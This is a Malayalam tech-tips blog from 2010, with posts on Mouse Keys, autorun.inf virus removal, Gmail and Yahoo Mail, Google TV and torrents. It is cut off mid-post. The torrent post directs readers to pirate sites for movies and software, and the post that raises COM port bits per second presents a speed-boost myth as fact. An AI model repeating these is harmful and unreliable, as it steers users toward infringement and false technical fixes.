ഓട്ടോ റണ്‍ വൈറസ് പ്രോബ്ലം ഉണ്ടോ??.... "Flash Guard Software" ഉപയോഗിച്ചു നോക്കൂ......
Download Flash Guard
Friday, October 29, 2010
Thursday, October 28, 2010
മൗസ് വര്‍ക്ക് ചെയ്യുന്നില്ലേ ? കീ ബോര്‍ഡ് മൗസ് ആയി ഉപയോഗിക്കാം!
നിങ്ങളുടെ മൗസ് പണി പറ്റിച്ചോ ???പേടിക്കേണ്ട.. കീ ബോര്‍ഡ് വഴി മൗസ് നീക്കവും ക്ലിക്കും സാധിക്കും ..ഇതിനു വേണ്ടി താഴെ പറയുന്ന രൂപത്തില്‍ നിങ്ങളുടെ കമ്പ്യൂട്ടറില്‍ ചെയ്യുക.
Start > Control Panel > Accessibility Option > Mouse > Click on "Use Mouse Keys"
മൌസേന്റെയ് കര്‍സര്‍ നീക്കാന്‍ 2,4,6,8 എന്നെ നമ്പര്‍ അമര്‍ത്തുക ...ഡബിള്‍ ക്ലിക്ക് ചെയ്യാന്‍ 5 അമര്‍ത്തുക ..
മൗസ് ഇല്ല..പണി നടക്കുന്നില്ല.. എന്നൊന്നും ഇനി ആരും പറയരുത് !
യാഹൂ മെയില്‍ പരിഷ്‌ക്കരിക്കുകയാണ്
ഇമെയില്‍ രംഗത്ത് എതിരാളികളായ ഗൂഗിളും മൈക്രോസോഫ്ടും നടത്തുന്ന മുന്നേറ്റത്തിന് മുന്നില്‍ ഇതുവരെ വെറും കാഴ്ച്ചക്കാരായി നില്‍ക്കുകയായിരുന്നു യാഹൂ. ഇനിയതല്ല സ്ഥിതി. അഞ്ചു വര്‍ഷത്തിന് ശേഷം യാഹൂ മെയില്‍ (Yahoo Mail) പരിഷ്‌ക്കരിക്കുകയാണ്. പുതിയ കാലത്തെ കമ്മ്യൂണിക്കേഷന്‍ പ്രവണതകള്‍ പ്രതിഫലിപ്പിക്കത്ത വിധമുള്ള കാതലായ മാറ്റമാണ് യാഹൂ അതിന്റെ മെയില്‍ സര്‍വീസില്‍ വരുത്തുന്നത്.
27.9 കോടി യൂസര്‍മാരാണ് ലോകത്താകെ യാഹൂ മെയിലിനുള്ളത്. അവരെ സംബന്ധിച്ച് യാഹൂ മെയിലില്‍ പ്രവേശിപ്പിച്ചാല്‍ അവിടെ നിന്ന് പോകാതെ തന്നെ ഫെയ്‌സ്ബുക്ക്, ട്വിറ്റര്‍ തുടങ്ങിയ സൗഹൃദക്കൂട്ടായ്മാ സൈറ്റുകളില്‍ (സോഷ്യല്‍ മീഡിയ സൈറ്റുകളില്‍) അപ്‌ഡേറ്റുകള്‍ പോസ്റ്റ് ചെയ്യാനാകും വിധമുള്ള മാറ്റമാണ് പ്രധാനപ്പെട്ടത്. കൂടുതല്‍ സോഷ്യല്‍ മീഡിയ സൗഹൃദ സര്‍വീസായി യാഹൂ മെയില്‍ മാറുമെന്ന് സാരം.
ഇസ്റ്റന്റ് മെസേജുകളും ടെക്‌സ്റ്റിങും കൂടുതല്‍ അനായാസമാക്കത്തക്ക വിധമുള്ള പരിഷ്‌ക്കരണവും നടത്തിയിട്ടുണ്ട്. ഗൂഗിളിന്റെ ജിമെയില്‍, മൈക്രോസോഫ്ടിന്റെഹോട്ട്‌മെയില്‍ എന്നിവയെ അപേക്ഷിച്ച് ഇരട്ടി വേഗത്തില്‍ സന്ദേശങ്ങളയയ്ക്കാന്‍ ഇനി തങ്ങളുടെ മെയിലില്‍ കഴിയുമെന്ന് യാഹൂ പറയുന്നു.
മാത്രമല്ല, ഫ്ലക്കര്‍, പിക്കാസ, യുടൂബ് തുടങ്ങിയ സൈറ്റുകളില്‍ നിന്ന് ഫോട്ടോകളും വീഡിയോകളും ഇമെയില്‍ ഇന്‍ബോക്‌സില്‍ നിന്ന് തന്നെ കാണാനുള്ള സൗകര്യവും യാഹൂ മെയിലിലുണ്ടാകും. പാഴ്‌മെയിലുകളെ (സ്പാം മെയില്‍) വകതിരിച്ച് മാറ്റാനുള്ള സംവിധാനമാണ് യാഹൂ മെയിലില്‍ പുതിയതായി ഏര്‍പ്പെടുത്തിയിട്ടുള്ള മറ്റൊരു പരിഷ്‌ക്കാരം.
യാഹൂ മെയിലില്‍ യൂസര്‍മാര്‍ മൊത്തം ചെലവിടുന്ന സമയം പ്രതിമാസം 50 കോടി മണിക്കൂറിലേറെയാണെന്ന്, യാഹൂ മെയില്‍ സീനിയര്‍ പ്രോഡക്ട് ഡയറക്ടര്‍ പറഞ്ഞു. അത്തരമൊരു ഉത്പന്നത്തില്‍ സുപ്രധാനമായ മാറ്റങ്ങള്‍ അഞ്ചു വര്‍ഷത്തിനുള്ളില്‍ ആദ്യമായി വരുത്തുക എന്നത്, യൂസര്‍മാരെ സംബന്ധിച്ച് പ്രധാനമാണെന്ന് അദ്ദേഹം അഭിപ്രായപ്പെട്ടു.
ഗൂഗിള്‍ അതിന്റെ ജിമെയിലില്‍ ഒട്ടേറെ മാറ്റങ്ങള്‍ കഴിഞ്ഞ മാസങ്ങളില്‍ വരുത്തുകയുണ്ടായി. അതില്‍ ഏറ്റവും പ്രധാനം, മെയിലുകളെ പ്രാധാന്യമനുസരിച്ച് വേര്‍തിരിക്കാന്‍ സഹായിക്കുന്ന 'പ്രയോരിറ്റി ഇന്‍ബോക്‌സ്' സംവിധാനമായിരുന്നു. കഴിഞ്ഞ മാസമാണ് ആ സങ്കേതം ജിമെയില്‍ അവതരിപ്പിച്ചത്. മൈക്രോസോഫ്ടും ഹോട്ട്‌മെയിലില്‍ ഒട്ടേറെ പരിഷ്‌ക്കാരങ്ങള്‍ അടുത്തയിടെ വരുത്തിയിരുന്നു.
പ്രതിയോഗികളോട് മത്സരിക്കാന്‍ പാകത്തിലുള്ള ഉത്പന്നങ്ങള്‍ ഇപ്പോഴും യാഹൂവിന്റെ പക്കലുണ്ടെന്നാണ് യാഹൂ മെയിലില്‍ വരുത്തുന്ന പരിഷ്‌ക്കരണം വ്യക്തമാക്കുന്നതെന്ന്, സ്റ്റെര്‍ലിങ് മാര്‍ക്കറ്റ് ഇന്റലിജന്‍സിലെ ഗ്രെഗ് സ്റ്റെര്‍ലിങ് വിലയിരുത്തി. യാഹൂവിനെ സംബന്ധിച്ച് മികച്ച യൂസര്‍ അടിസ്ഥാനമുള്ള സര്‍വീസാണ് അതിന്റെ മെയില്‍.

Wednesday, October 27, 2010
വൈറസ് പ്രോബ്ലം ....(Autorun.inf )
നമ്മള്‍ എല്ലാവരും നേരിടുന്ന ഒരു വൈറസ് പ്രോബ്ലം ആണ് Autorun.
പലപോലും USB വഴിയാണ് നമ്മുടെ കമ്പ്യൂട്ടറില്‍ വൈറസ് കടന്നു കൂടുന്നത്.
( ഓട്ടോ റണ്‍ എന്ന ഫയല്‍ ആണ് വൈറസിനെ പ്രവര്‍ത്തിപ്പിക്കുന്നത്. ഒരു USBയില്‍ നമ്മള്‍ ഡബിള്‍ ക്ലിക്ക് ചെയ്യുമ്പോള്‍ അതിലെ ഓട്ടോ റണ്‍ വര്‍ക്ക് ചെയ്യും അപ്പോള്‍ വൈറസ് നമ്മുടെ കമ്പ്യൂട്ടര്‍ലേക്ക് കടന്നു കൂടും ആ വൈറസ് ഇന്റെ പ്രവര്‍ത്തനം അത് പ്രോഗ്രാം ചെയ്തിരിക്കുന്നത് അനുസരിച്ചിരിക്കും )
നമുക്കിനി ഓട്ടോ റണ്‍ റിമൂവ് ചെയുന്നതെങ്ങനെ എന്ന് നോക്കാം...
ആദ്യം മൈ കമ്പ്യൂട്ടര്‍ Explore ചെയ്യുക (വിന്‍ഡോസ് 7 ഇല്‍ My computer ഓപ്പണ്‍ ചെയ്യുക . xp യില്‍ ഓപ്പണ്‍ ചെയ്തിട്ട് അഡ്രസ് ബാറിനു മുകളിലായി Folders എന്ന ഒരു ഐക്കണ്‍ കാണും അതില്‍ ക്ലിക്ക് ചെയുക അപ്പോള്‍ അത് Explore ആകും )
തുടര്‍ന്ന് Start ഓപ്പണ്‍ ചെയ്ത് cmd എന്ന് ടൈപ്പ് ചെയ്ത് Enter അടിക്കുക. അപ്പോള്‍ കമാന്‍ഡ് പ്രോമ്പ്റ്റ് ഓപ്പണ്‍ ആകും (റണ്‍ ഓപ്പണ്‍ ചെയാന്‍ കിബോര്‍ഡില്‍ സ്റ്റാര്‍ട്ട് ബട്ടണ്‍ + R ബട്ടണ്‍ പ്രസ് ചെയ്താലും വരും )
കമാന്‍ഡ് പ്രോപ്റ്റ് ഓപ്പണ്‍ ആകുമ്പോള്‍ ഇങ്ങനെ ആയിരിക്കും അതില്‍ കാണിക്കുന്നത്
c:\users\user(user എന്നുള്ളത് നിങ്ങളുടെ യുസര്‍ നെയിം ആയിരിക്കും)
അവിടെ നിന്നും നിങ്ങള്‍ക്ക് C ഡ്രൈവ്ലേക്ക് വരണം അതിനു ഈ കമാന്‍ഡ് കൊടുക്കുക cd..(cd എന്ന് എഴുതിയിട്ട് രണ്ടു ഡോട്ട്)
എന്റര്‍ അടിക്കുക അങ്ങനെ c ഡ്രൈവില്‍ എത്തുന്നത് വരെ അങ്ങനെ ചെയ്യുക.
അതിനു ശേഷം ഈ കമാന്‍ഡ് അടിക്കുക. ഈ കമാന്‍ഡ് കൊടുക്കുന്നതിനു മുന്പ് explorer ഇല്‍ c ഡ്രൈവ് ഓപ്പണ്‍ ചെയ്തു വക്കണം
എന്നിട്ട് ഈ കമാന്‍ഡ് കൊടുക്കുക
c:\>attrib -a -s -h autorun.inf എന്ന് കൊടുക്കുക എന്നിട്ട് എന്റര്‍ അടിക്കുക.അപ്പോള്‍ നിങ്ങളുടെ c ഡ്രൈവില്‍ ഓട്ടോ റണ്‍ അഫ്ഫെക്റ്റ് ചെയ്തിട്ടുണ്ടെങ്കില്‍ അത് അവിടെ കാണിക്കും എന്നിട്ട് അത് ഡിലീറ്റ് ചെയ്യുക
അങ്ങനെ നിങ്ങളുടെ കമ്പ്യൂട്ടറില്‍ എത്ര ഡ്രൈവ് ഉണ്ടോ അതിലെല്ലാം ഇതുപോലെ ചെയ്യുക.
ഇത് ചെയ്യുമ്പോള്‍ ശ്രദ്ധിക്കേണ്ട കാര്യം നിങ്ങള്‍ ഡ്രൈവ് ഡബിള്‍ ക്ലിക്ക് ചെയ്തു ഓപ്പണ്‍ ചെയ്യരുത് explore ചെയ്തിട്ട് ലെഫ്റ്റ് സൈഡിലുള്ള ഡ്രൈവിന്റെ ഐകനില്‍ ക്ലിക്ക് ചെയ്തു ഓപ്പണ്‍ ചെയാന്‍ പാടുള്ളൂ അല്ലാതെ ഡബിള്‍ ക്ലിക്ക് ചെയ്താല്‍ ഓട്ടോ റണ്‍ സ്പ്രെഡ് ആകുകയേ ഉള്ളു .
C ഡ്രൈവ് ചെയ്യുന്നതിന് മുന്പ് ആദ്യം നിങ്ങളുടെ usb ചെയ്യുന്നതായിരിക്കും നല്ലത്.
പിന്നേ എല്ലാ ഡ്രൈവില്‍ ഉള്ള ഓട്ടോ റണ്‍ ഫയല്‍ ഡിലീറ്റ് ചെയ്താല്‍ വേറെ ഒന്നും ചെയ്യാതെ നേരെ കമ്പ്യൂട്ടര്‍ റീസ്റ്റാര്‍ട്ട് ചെയുക.
NB: ഓട്ടോറണ്‍ ഫയല്‍ ഒരു നോട്ട് പാടില്‍ ഓപ്പണ്‍ ചെയ്താല്‍ നിങ്ങള്‍ക്ക് നിങ്ങളുടെ കമ്പ്യൂട്ടര്‍നെ അഫക്റ്റ് ചെയ്തിരിക്കുന്ന വൈറസ് ഫയല്‍ ഏതാണെന്ന് കാണാം.
ഒരു വിധം വൈറസുകളെ നമുക്കിങ്ങനെ remove ചെയ്യാം .ഈ ഓട്ടോറണ്‍ കമ്പ്യൂട്ടറില്‍ നിന്നും പോയാല്‍ ഒട്ടുമിക്ക വൈറസ് കളും പ്രവര്‍ത്തന രഹിതമാകും..ചില വൈറസ്‌കള്‍ ഓട്ടോ റണ്‍ നെ Recreate ചെയ്യാന്‍ പ്രാപ്തി ഉള്ളതായിരിക്കും അപ്പോള്‍ ഈ കമാന്‍ഡ് ചെയ്താല്‍ കാര്യമില്ല അതിനു ആദ്യം ആന്റിവൈറസ് ചെയ്യേണ്ടതായിട്ടുണ്ട്.
ചില കമ്പ്യൂട്ടറില്‍ ആന്റിവൈറസ് ഓട്ടോറണ്‍ റിമൂവ് ചെയ്തു കഴിഞ്ഞാല്‍ ഡ്രൈവ് ഇല്‍ നമ്മള്‍ ഡബിള്‍ ക്ലിക്ക് ചെയുമ്പോള്‍ ഓപ്പണ്‍ വിത്ത് എന്ന് കാണിക്കും അത് റിമൂവ് ചെയാനും ഈ കമാന്‍ഡ് യുസ് ചെയാം.
ഒരു നല്ല antivirus ആണ് നമ്മുടെ കമ്പ്യൂട്ടര്‍നു ആവശ്യം.അത് പോലെ തന്നെ അത് ദിനവും അപ്ഡേറ്റ് ചെയ്തു വക്കുക .
ഇന്റര്‍നെറ്റ് കണക്ഷന്‍ ഇല്ല എങ്കില്‍ അപ്ഡേറ്റ് ഫയല്‍ ഡൌണ്‍ലോഡ് ചെയ്തെടുത് ഇന്റര്‍നെറ്റ് കണക്ഷന്‍ ഇല്ലാത്ത കമ്പ്യൂട്ടറില്‍ കുണ്ടുപോയി ഇന്‍സ്റ്റോള്‍ ചെയ്താലും മതിയാകും.
ജി- മെയില്‍ ടിപ്സ്
മെയില്‍ വായ്ക്കുംമ്പോള്‍ പുതിയ മെയില്‍ Compose ചെയ്യന്‍ Shift+Compose ബട്ടണ്‍ ഉപയോഗിക്കുക. ഇതിലൂടെ വായിച്ചു കൊണ്ടിരിക്കുന്ന പേജ് നഷ്ടപെടാതെ തന്നെ പുതിയ പേജില്‍ മെയില്‍ അയക്കന്‍ പറ്റും.
Thursday, October 21, 2010
ഗൂഗിള്‍ ടി.വി. സോണി അവതരിപ്പിച്ചു
ടെലിവിഷന്‍ എന്ന പരമ്പരാഗത മാധ്യമത്തെ ഒറ്റയടിക്ക് ഇന്റര്‍നെറ്റുമായി സമ്മേളിപ്പിക്കുന്ന സങ്കേതമാണ് ഗൂഗിള്‍ ടിവി. ഈ സങ്കേതം ഉപയോഗിച്ചിട്ടുള്ള ആദ്യ ടെലിവിഷന്‍ സോണി കമ്പനി അവതരിപ്പിച്ചു. അമേരിക്കയിലാണ് ആദ്യം ഇത്തരം ടിവികള്‍ ലഭ്യമാവുക. ഡിസംബറോടെ ഇത് മറ്റ് രാജ്യങ്ങളിലും വില്‍പ്പനയ്‌ക്കെത്തുമെന്ന് റിപ്പോര്‍ട്ടുകള്‍ പറയുന്നു.
24 ഇഞ്ച്, 32 ഇഞ്ച്, 40 ഇഞ്ച്, 46 ഇഞ്ച് വലിപ്പങ്ങളില്‍ നാല് മോഡലുകളാണ് സോണി ഇറക്കുന്നത്. ഇവയുടെ വില യഥാക്രമം 600 ഡോളര്‍ (26000 രൂപ), 800 ഡോളര്‍ (35000 രൂപ), 1000 ഡോളര്‍ (44000 രൂപ), 1400 ഡോളര്‍ (61000 രൂപ) എന്നിങ്ങനെയാണ്.
'ടെലിവിഷന്റെയും പൂര്‍ണ ഇന്റര്‍നെറ്റ് സെര്‍ച്ചിന്റെയും അനുഭവം ഒരുമിച്ച് ലഭ്യമാകുന്ന ലോകത്തെ ആദ്യ എച്ച്ഡിടിവിയാണ് സോണി ഇന്റര്‍നെറ്റ് ടിവി'യെന്ന് സോണിയുടെ സീനിയര്‍ വൈസ്പ്രസിഡന്റ് മൈക്ക് അബാറി പറഞ്ഞു.
ടെലിവിഷനെ ഇന്റര്‍നെറ്റ് ബ്രൗസിങിനുള്ള ഉപകരണം കൂടിയാക്കി മാറ്റുകയാണ് ഗൂഗിള്‍ ടിവി ചെയ്യുക. യുടൂബ് വീഡിയോകള്‍ ഇനി തടസ്സമില്ലാതെ ടെലിവിഷനില്‍ തന്നെ ആസ്വദിക്കാം.
ഇന്റല്‍ ആറ്റം പ്രോസസറും ഗൂഗിളിന്റെ മൊബൈല്‍ പ്ലാറ്റ്‌ഫോമായ ആന്‍ഡ്രോയിഡുമാണ് ഗൂഗിള്‍ ടിവിയുടെ കാതല്‍. ഗൂഗിളിന്റെ തന്നെ ക്രോം ബ്രൗസറാണ് ഇതിലുള്ളത്.
ലോഗിടെക്കാണ് ഗൂഗിള്‍ ടിവിക്കാവശ്യമായ വയര്‍ലെസ് കീബോര്‍ഡ് നിര്‍മിക്കുന്നത്. ബില്‍ട്ടിന്‍ ഓപ്ടിക്കല്‍ മൗസോടു കൂടിയ ക്യുവര്‍ത്തി കീബോര്‍ഡ് ഉപയോഗിച്ച് സുഗമമായി ഇന്റര്‍നെറ്റ് ബ്രൗസ് ചെയ്യാന്‍ കഴിയും.
Wednesday, October 20, 2010
എന്താണ് ടൊറന്റ്(Torrent) ?
എന്താണ് ടൊറന്റ്?നമ്മളില്‍ പലര്‍ക്കും ടൊറന്റ് എന്താണെന്നു പോലും അറിയില്ലായിരിക്കും.എന്നാല്‍ പലപ്പോഴും ഈ പേര് കേട്ടിരിക്കാന്‍ സാധ്യതയുണ്ട്. എങ്ങനെ ടൊറന്റ് വഴി ഒരു ഫയല്‍ ഡൌന്‍ലോഡ് ചെയ്യാം?നമുക്ക് നോക്കാം ....
രണ്ടോ മൂന്നോ കെബി വരുന്ന ഒരു ചെറിയ ഫയലാണ് ടൊറന്റ് .ഈ ചെറിയ ടോറന്റ് ഫയലില്‍ ആണ് നാം ഡൌന്‍ലോഡ് ചെയ്യാന്‍ ഉദ്ദേശിക്കുന്ന ഫയലിന്റെ മിക്ക വിവരങ്ങളും അടങ്ങിയിരിക്കുന്നത്.ഈ ടൊറന്റ് ഫയല്‍ വഴി വലിയ ഫയലുകളായ സിനിമകള്‍ ,സോഫ്റ്റുവെയറുകള്‍,ഈ ബുക്കുകള്‍,അങ്ങനെ എന്തും ഡൌണ്‍ലോഡ് ചെയ്യാം
ഇനി ടൊറന്റുകള്‍ ഉപയോഗിച്ച് ഡൌന്‍ലോഡ് ചെയ്യുന്നത് എങ്ങനെയെന്നു നോക്കാം ,ഇതിനായി ആദ്യം വേണ്ടത് ഒരു ടൊറന്റ് ക്ലെയിന്റ് സോഫ്റ്റ്വെയര്‍ ആണ്, ഇത് സൌജന്യമായി ഇവിടെ നിന്നും ഡൌന്‍ലോഡ് ചെയ്ത് കമ്പ്യൂട്ടറില്‍ ഇന്‍സ്റ്റാള്‍ ചെയ്യണം.
ഇനി ,ടൊറന്റ് ഫയലുകള്‍ ലഭിക്കുന്നതിനായി ഒട്ടനവധി ടൊറന്റ് സെര്‍ച്ച് എഞ്ചിനുകള്‍ ഉണ്ട് isohunt.com,torrentz.com,thepiratebay.org എന്നിവ അത്തരത്തില്‍ പെട്ടവയാണ്.ഇതില്‍ thepiratebay.org ല്‍ നിന്ന് സോഫ്റ്റ്വെയറുകളും, torrentz.com വഴി സിനിമകളും ,സൊഫ്റ്റ്വെയറുകളും ലഭിക്കും.ഇനി ഇവയില്‍ പോയി ഏതെങ്കിലും സോഫ്റ്റ്‌വെയര്‍ പേര് കൊടുത്ത് സെര്‍ച്ച് ചെയ്താല്‍ ആ പേരിലുള്ള ധാരാളം സോഫ്റ്റ്‌വെയര്‍കള്‍ ലഭിക്കും. ഇങ്ങനെ ലഭിക്കുന്ന ഉത്തരങ്ങളില്‍ സീഡുകള്‍ കൂടുതല്‍ ഉള്ള ഒരെണ്ണത്തില്‍ ക്ലിക്ക് ചെയ്താല്‍ നമ്മള്‍ ഡൌന്‍ലോഡ് ചെയ്യാന്‍ ഉദ്ദേശിക്കുന്ന ഫയലിനെക്കുറിച്ച് കൂടുതല്‍ അറിയാം കൂടാതെ download torrent എന്ന ലിങ്കും കാണും ഇതില്‍ ക്ലിക്ക് ചെയ്താല്‍ ടൊറന്റ് ഫയല്‍ ഡൌന്‍ലോഡ് ചെയ്യാം. നിങ്ങള്‍ ഫയര്‍ഫോക്സ് ആണ് ഉപയോഗിക്കുന്നത് എങ്കില്‍ ഡൌന്‍ലോഡ് ചെയ്യുമ്പോള്‍ തന്നെ open with uTorrent എന്ന് കാണിക്കും ഇല്ലെങ്കില്‍ ഡൌന്‍ലോഡ് ചെയ്ത ടൊറന്റ് ഫയലില്‍ ഡബിള്‍ ക്ലിക്ക് ചെയ്താല്‍ uTorrent വഴി അത് ഓപ്പണ്‍ ആകും,ഇത് ഓപ്പണ്‍ ആയിക്കഴിഞ്ഞാല്‍ അപ്പോള്‍ മുതല്‍ നിങ്ങളുടെ ഫയല്‍ ഡൌന്‍ലോഡ് ആയിത്തുടങ്ങും.
ഡൌണ്‍ലോഡ് കഴിയുമ്പോള്‍ uTorrent ല്‍ Download complete എന്ന് കാണിക്കും.ഡൌണ്‍ലോഡ് ചെയ്ത് കഴിഞ്ഞാലുടന്‍ uTorrent ല്‍ ടൊറന്റ് ഫയലില്‍ റൈറ്റ് ക്ലിക്ക് ചെയ്ത് ടൊറന്റ് ഫയല്‍ റിമൂവ് ചെയ്യാന്‍ മറക്കരുത്,അതിന് ശേഷം uTorrent സൊഫ്റ്റ്വെയര്‍ exit ചെയ്യുക.
NOTE:ടൊറന്റ് വഴി ഡൌന്‍ലോഡ് ചെയ്ത ഫയലുകള്‍ ആന്റി വൈറസുകള്‍ ഉപയോഗിച്ച് സ്കാന്‍ ചെയ്തതിന് ശേഷം മാത്രമേ ഉപയോഗിക്കാവൂ.

ജി-മെയില്‍ ഡ്രൈവ് (Gmail Drive)
നിങ്ങളുടെ ജിമെയില്‍ ഇന്‍ബോക്സ് ഒരു ഫയല്‍ സ്റ്റോറേജിനായി ഉപയോഗിക്കാന്‍ കഴിഞ്ഞാല്‍...!!അതും ഗൂഗിളിന്റെ എല്ലാ സെക്യൂരിറ്റിയോടും കൂടെ.!ഇന്ന് ഗൂഗിള്‍ ഒരു സാധാരണ ഉപഭോക്താവിന് 7GB യോളം സ്പേസ് തരുന്നുണ്ട്.(സ്പേസ് നിറയാറാവുമ്പോഴേക്കും അത് കൂട്ടിക്കിട്ടും.പരോക്ഷത്തില്‍ അണ്‍ലിമിറ്റ്...!!)ഇത് നമുക്ക് പലവിധത്തില്‍ ഉപയോഗപ്പെടും.അതിന് ഉപയോഗിക്കാവുന്ന ഒരു shell extension ആണ് ജിമെയില്‍ ഡ്രൈവ് (Gmail Drive) ഈ പ്രോഗ്രാം ഇന്‍സ്റ്റാള്‍ ചെയ്തുകഴിഞ്ഞാല്‍ നിങ്ങളുടെ കമ്പൂട്ടറിന്റെ Windows Explorer- ല്‍ ഒരു ഡ്രൈവ് നിര്‍മ്മിക്കും.
അതിലേക്ക് നിങ്ങള്‍ക്ക് ഫയലുകള്‍ ഡ്രാഗ് ചെയ്തിടുകയൊ കോപ്പി ചെയ്യുകയോ ചെയ്യാം.അപ്പോള്‍തന്നെ അത് ഒരു അറ്റാച്ച്ഡ് ഇ-മെയിലായി നിങ്ങളുടെ ഇന്‍ബോക്സില്‍ സൂക്ഷിക്കപ്പെടുകയും ചെയ്യും.പിന്നീട് അത് എപ്പോള്‍ വേണമെങ്കിലും നിങ്ങള്‍ക്ക് ഡൗണ്‍ലോഡ് ചെയ്ത് ഉപയോഗിക്കാനും പറ്റും.സാധാരണ വിന്‍ഡോസ് ഡ്രൈവുകള്‍ ഉപയോഗിക്കുന്നതുപോലെ ഈ ഡ്രൈവും ഉപയോഗിക്കാം.
ഇന്റെര്‍നെറ്റ് കണക്ഷന്‍ ഇല്ലാതെയും ജിമെയില്‍ ഉപയോഗിക്കാം !
പലരും അഭിമുഖീകരിക്കുന്ന ഒരു പ്രശ്നമാണ് മെയില്‍ വായിക്കുന്നതിന് ഇടയ്ക്ക് വെച്ച് ഇന്റെര്‍നെറ്റ് കണക്ഷന്‍ കട്ടാകുന്നത്,ഇതിനോരു പരിഹാരവുമായിതാ ഗൂഗിള്‍ എത്തിയിരിക്കുന്നു,ജിമെയില്‍ ഓഫ് ലൈന്‍,ഇത് വഴി ഇന്റെര്‍നെറ്റ് ഇല്ലാത്തപ്പോഴും ജിമെയില്‍ ഉപയോഗിക്കാം,ഓഫ് ലൈനായിരുക്കുമ്പോള്‍ ചെയ്യാന്‍ കഴിയുന്ന കാര്യങ്ങള്‍
1. മെയില്‍ വായിക്കാം
2. മെയില്‍ അയയ്ക്കാം
3. മെയില്‍ സെര്‍ച്ച് ചെയ്യാം
4. മെയില്‍ സ്റ്റാര്‍ ചെയ്യാം
ഇങ്ങനെ ഓണ്‍ലൈനായിരിക്കുമ്പോള്‍ ചെയ്യാന്‍ കഴിയുന്ന ഒട്ട്മിക്ക കാര്യങ്ങളും ഇന്റെര്‍നെറ്റ് കണക്ഷന്‍ ഇല്ലാതെതന്നെ ചെയ്യാം.ഓഫ് ലൈന്‍ ആയിരിക്കുമ്പോള്‍ നിങ്ങള്‍ അയയ്ക്കുന്ന മെയിലുകള്‍ ഔട്ട്ബോക്സില്‍ പോയിക്കിടയ്ക്കും പിന്നീട് എപ്പോഴെങ്കിലും ഇന്റെര്‍നെറ്റ് കണക്ഷന്‍ വരുമ്പോള്‍ മെയിലുകള്‍ നിങ്ങള്‍ ഒന്നും ചെയ്യാതെ തന്നെ അയച്ചുകോള്ളും
ഇതിന് വേണ്ടി നിങ്ങള്‍ക്ക് ഗൂഗിളിന്റെ Gears ആവശ്യമാണ് അത് ഇല്ലാത്തവര്‍ ഇവിടെ നിന്നും ഡൌണ്‍ലോഡ് ചെയ്യുക,നിങ്ങളുടെ ഇന്റെര്‍നെറ്റ് കണക്ഷന്‍ നഷ്ടപ്പെടുകയാണെങ്കില്‍ ജിമെയില്‍ ഓഫ് ലൈന്‍ മോഡിലേക്ക് മാറും.
ഗൂഗിളിന്റെ ഈ പുതിയ സേവനം ലഭ്യമാകുന്നതിനായി താഴെ പറയുന്ന കാര്യങ്ങള്‍ ചെയ്യണം
* ആദ്യമായി ഗൂഗിള്‍ ഓഫ് ലൈന്‍ എനേബിള്‍ ചെയ്യണം അതിനായി ജിമെയില്‍ ലാബ് പേജില്‍ പോകണം
* എനേബിള്‍ ചെയ്താല്‍ ഇന്‍ബോക്സില്‍ വന്ന് Offline ലിങ്കില്‍ ക്ലിക്ക് ചെയ്യണം ഇത് ഇന്‍ബോക്സിന് മുകളിലായി സെറ്റിങ്ങ്സിന് തൊട്ടടുത്തായി കാണാം.
* Offline ല്‍ ക്ലിക്ക് ചെയ്താല്‍ നിങ്ങളുടെ മെസേജുകള്‍ കമ്പ്യൂട്ടറിലേക്ക് സേവ് ചെയ്യും.
ഇത് ഇന്റെര്‍നെറ്റ് എക്സ്പ്ലോറര്‍ 7+,മോസില്ല ഫയര്‍ഫോക്സ് 2+,സഫാരി 3+.ഗൂഗിള്‍ ക്രോം എന്നിവയില്‍ പ്രവര്‍ത്തിക്കും ഗൂഗിള്‍ ക്രോംമില്‍ Gearsന്റെ ആവശ്യം ഇല്ല ഗൂഗിള്‍ ക്രോംമിനോടൊപ്പം Gears ഇന്‍സ്റ്റാള്‍ ചെയ്തിട്ടുണ്ട്

ഇന്റര്‍നെറ്റ് സ്പീഡ് കൂട്ടാന്‍ മറ്റൊരു വിദ്യ !
ആദ്യം ഡെസ്ക്ടോപ്പില്‍ ഉള്ള My computer റൈറ്റ് ക്ലിക്ക് ചെയ്ത് അതിന്‍റെ properties എടുക്കുക.ശേഷം hardware ടാബില്‍ പോയി device maneger എടുക്കുക.തുടര്‍ന്നു വരുന്ന ലിസ്റ്റില്‍ നിന്നും ports എന്നത് കണ്ടുപിടിച്ച് ഡബിള്‍ ക്ലിക്ക് ചെയ്യുക.അപ്പോള്‍ അതില്‍ നിങ്ങള്ക്ക് communication port എന്നാ ഒപ്ഷന്‍ കിട്ടും.അതില്‍ ഡബിള്‍ ക്ലിക്ക് ചെയ്യുതോ, അല്ലെങ്കില്‍ റൈറ്റ് ക്ലിക്ക് ചെയ്തോ അതിന്‍റെ properties എടുക്കുക.ഇപ്പോള്‍ നിങ്ങള്‍ക്കതില്‍ Port Setting എന്ന ടാബ് കാണാം.അതില്‍ ക്ലിക്ക് ചെയ്യുക.തുടര്‍ന്നു വരുന്ന ഒപ്ഷനില്‍ "Bits per second" എന്നതില്‍ 128000 എന്ന് കൂട്ടിക്കൊടുക്കുക.അതിനു താഴെ "Flow control" എന്നിടത്ത് Hardware എന്ന് കൊടുത്ത് ഒക്കെ പ്രസ് ചെയ്യുക.മതി...മതി...സംഗതി കഴിഞ്ഞു.....................
ഡൌണ്‍ലോഡ് സ്പീഡ് കൂട്ടുവാന്‍ ..
മൊബൈല്‍ വഴി കമ്പ്യൂട്ടറില്‍ നെറ്റ് ഉപയോഗിക്കുമ്പോള്‍ നമ്മള്‍ നേരിടുന്ന ഒരു പ്രശ്നമാണ് കുറഞ്ഞ ഡൌണ്‍ലോഡ് സ്പീഡ്. GPRS/EDGE ഉപയോഗിച്ച് ഡൌണ്‍ലോഡ് ചെയ്യുമ്പോള്‍ 4-12 Kb/s
